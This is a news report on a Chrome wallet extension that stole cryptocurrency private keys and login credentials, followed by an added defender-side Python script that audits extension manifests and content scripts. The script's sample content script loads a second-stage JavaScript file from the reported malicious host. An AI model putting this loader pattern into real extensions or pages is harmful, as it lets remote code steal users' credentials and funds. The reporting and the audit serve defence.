An add-on on Google Chrome steals cryptocurrency keys from its users

Mary388
3 years ago

A security researcher says that a Google Chrome extension called "Shitcoin Wallet" steals passwords and private keys from its users.

A Google Chrome extension has been discovered that injects JavaScript code into web pages to steal passwords and private keys from cryptocurrency wallets and cryptocurrency payment gateways.

The extension is named "Shitcoin Wallet" (Chrome extension ID: ckkgmccefffnbbalkmbbgebbojjogffn), and it was published last month, on December 9th.

According to the source, the Shitcoin Wallet extension lets users manage Ethereum (ETH) coins as well as ERC20-based tokens, the kind usually issued by ICOs.

Users can install the Google Chrome extension and manage ETH coins and ERC20 tokens from within their browser, or they can install a desktop application (currently Windows only) if they prefer to manage their funds outside the browser.

Either way, users are exposed to the malicious add-on, whether they use it from the browser or from the desktop.

How the malicious extension was detected, and what it does:

Security researcher Harry Denley, director of security at the MyCrypto platform, discovered that the extension contains malicious code.

According to Harry, the extension puts users at risk in two ways.

First, any funds (ETH tokens and ERC20 based tokens) that are directly managed within the extension are at risk.

Harry says the extension sends the private keys of all wallets created or managed through its interface to a third-party website.

Second, the extension also injects malicious JavaScript code when users visit five well-known and popular crypto management platforms.

This code steals login credentials and private keys and sends that data to the "erc20wallet" site.

According to a security analysis of the malicious code, the process is as follows:

Users install the Google Chrome extension.

The extension requests permission to inject JavaScript code into 77 websites [included here].

When users visit any of these 77 sites, the extension downloads an additional JS file from https://erc20wallet[.]tk/js/content_.js and injects it into the page.

This JS file contains obfuscated code.

The code is activated at five locations: MyEtherWallet.com, Idex.Market, Binance.org, NeoTracker.io, and Switcheo.exchange.

Once activated, the malicious JS code records the user's login credentials, searches for private keys stored within the dashboards of the five services, and finally, sends the data to erc20wallet.tk.
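As an added, defender-side example (not code from the report, the researcher, or the extension itself), here is a small Python audit that checks an extension's files for the two signals described above: a manifest whose content scripts reach wallet sites alongside a blanket host permission, and a content script that loads a second stage from a remote host. The manifest and content script below are constructed samples; only the five host names and the erc20wallet.tk URL come from the report.

```python
import json
import re

# Constructed sample manifest (not the real extension's) modelled on the
# report: a content script matched against wallet sites plus <all_urls>.
SAMPLE_MANIFEST = json.dumps({
    "name": "example-wallet", "manifest_version": 2,
    "permissions": ["storage", "tabs", "<all_urls>"],
    "content_scripts": [{"js": ["content.js"], "matches": [
        "https://www.myetherwallet.com/*", "*://*.idex.market/*",
        "https://www.binance.org/*", "https://neotracker.io/*",
        "https://switcheo.exchange/*", "https://example.com/*"]}],
})

# Constructed sample content script that pulls a second stage from a remote
# host, as the report says the extension did.
SAMPLE_CONTENT_JS = """
var s = document.createElement('script');
s.src = 'https://erc20wallet.tk/js/content_.js';
document.head.appendChild(s);
"""

# The five services named in the report.
SENSITIVE_HOSTS = {"myetherwallet.com", "idex.market", "binance.org",
                   "neotracker.io", "switcheo.exchange"}
REMOTE_URL = re.compile(r"https?://([\w.-]+)", re.I)

def match_host(pattern):
    """Bare host from a Chrome match pattern such as '*://*.idex.market/*'."""
    host = re.sub(r"^[\w*]+://(\*\.)?", "", pattern).split("/")[0]
    return host[4:] if host.startswith("www.") else host

def audit_manifest(manifest_json):
    """Return human-readable findings about reach and permissions."""
    m = json.loads(manifest_json)
    findings = []
    perms = m.get("permissions", [])
    if "<all_urls>" in perms or any(p.endswith("://*/*") for p in perms):
        findings.append("host permission covers every site")
    hosts = {match_host(p) for cs in m.get("content_scripts", [])
             for p in cs.get("matches", [])}
    hit = sorted(h for h in hosts if h in SENSITIVE_HOSTS)
    if hit:
        findings.append("content script runs on wallet sites: " + ", ".join(hit))
    return findings

def remote_script_hosts(js_source):
    """Hosts a content script references by absolute URL (second-stage loads)."""
    return sorted({u.lower() for u in REMOTE_URL.findall(js_source)})
```

Run both functions over an unpacked extension directory (manifest.json plus every file listed under content_scripts); a remote host in the second result is what turns a static bundle into code that can change after review.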

Until recently, the extension was available for download through the official Google Chrome extension store, where it had more than 625 downloads.

It is not clear if the "Shitcoin Wallet" team was responsible for the malicious code, or whether the Google Chrome extension was hacked by a third party.
